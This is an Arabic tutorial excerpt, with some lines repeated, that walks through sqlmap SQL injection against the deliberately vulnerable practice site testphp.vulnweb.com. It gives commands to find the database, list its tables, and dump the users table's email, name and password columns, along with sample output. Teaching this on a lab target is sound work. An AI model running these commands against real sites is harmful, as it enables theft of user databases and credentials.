بعد ان قمنا بتثبيت الاداه راح نبدا نستخدمها علي موقعنا الاول و لي قمنا بفحصه و هاد هو
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/listproducts.php?cat=1
في بعض الأحيان ، يساعد استخدام -time-sec على تسريع العملية ، خاصةً عندما تكون استجابات الخادم بطيئة.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
اسم الداتا بيز تبع الموقع acuart
بعد طلعنا اسم الداتا بيز راح نطلع اسماء الجداول الموجوده بالموقع و ذلك عن طريق الامر التالي
بعد طلعنا اسم الداتا بيز راح نطلع اسماء الجداول الموجوده بالموقع و ذلك عن طريق الامر التالي
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
جلب ما بداخل جدول user
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump